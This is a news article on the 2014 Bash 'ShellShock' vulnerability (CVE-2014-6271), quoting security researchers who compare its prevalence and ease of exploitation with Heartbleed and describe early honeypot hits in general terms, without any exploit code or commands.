Worse than Heartbleed. That's what security professionals are saying about the newly discovered “Bash Bug,” a vulnerability in the Unix Bourne Again Shell (BASH) that makes it possible for attackers to exploit Linux and Apple OS X systems.
While the CVE-2014-6271 bug, also referred to as ShellShock, is posited to have existed for many years, it was just discovered last week by Akamai security researcher Stephane Chazelas. And pronouncements that it is worse than Heartbleed, the critical vulnerability that was discovered in widely used versions of the OpenSSL library, stem from the prevalence of Bash shells in everything from servers to web-connected Internet of Everything (IoT) devices.
“It is the worst vulnerability we have seen so far this year,” Roel Schouwenberg, a senior researcher Kaspersky Labs, told SCMagazine.com in a Thursday interview. Unlike Heartbleed, “which was really about attackers getting information from machines,” the Bash Bug “executes arbitrary commands from affected devices, mostly Web servers.”
Calling ShellShock “far more prevalent,” David Larson, CTO at Corero Network Security pointed out to SCMagazine.com in a Thursday email correspondence that “the bug impacts Linux/Apache machines which makes up over 50 percent of the population [and]…impacts the last 25 years of BASH versions,” whereas Heartbleed was only dangerous to “a specific version of OpenSSL. This is big.”
Schouwenberg said that it is too early to gauge the extent of the damage that the Bash Bug can do. “We don't understand the scope of this vulnerability,” he said. But since security experts keep spinning a seemingly endless number of scenarios in which the vulnerability could be exploited, “that makes it very serious.”
Because bash is “a common shell for evaluating and executing commands from other programs,” Akamai CISO Andy Elllis said in a Thursday blog post that the “vulnerability may affect many applications that evaluate user input, and call other applications via a shell.” And ultimately, that allows “an adversary…[to] pass commands to bash to execute arbitrary code,” he wrote.
Jaime Blasco, director of AlienVault Labs, in a Thursday blog post, called the vulnerability “critical since it can be exposed on web servers that use mod_cgi or code that calls the bash shell.” He said that the other systems that might be affected include “network services and daemons that use shell scripts with environmental variables.”
AlienVault has been running a honeypot for the vulnerability since Wednesday, lying in wait for attackers to exploit it, and in less than 24 hours “have had several hits.” Most, he wrote, “are systems trying to detect if the system is vulnerable and they simply send a ping command back to the attacker's machine.”
In some of the attacks that security experts are seeing in the wild, exploiting ShellShock can be “as simple as telling the server, ‘Hey, download this file and run it,' and an attacker has access to the box,” Ronnie Tokazowski, senior researcher at PhishMe, told SCMagazine.com in a Thursday email correspondence. “With very little effort, an attacker could set up DDoS attacks, create a botnet with affected devices, or crash all of these devices if they wanted to.”
It is that ease of use, which Tokazowski rates at “11, possibly a 12,” that helps ShellShock edge ahead of Heartbleed in terms of potential impact.
With Heartbleed, an attacker “has to get lucky to find a username and password combination that works, then needs to find a VPN concentrator or some other login form, and hope that an enterprise isn't doing geolocation IP matching based off of usernames,” he said. “Once there, the attacker would then have to find a vulnerability on the system to break out of the app to get on the system, and then perform a privilege escalation attack in order to gain root level access.”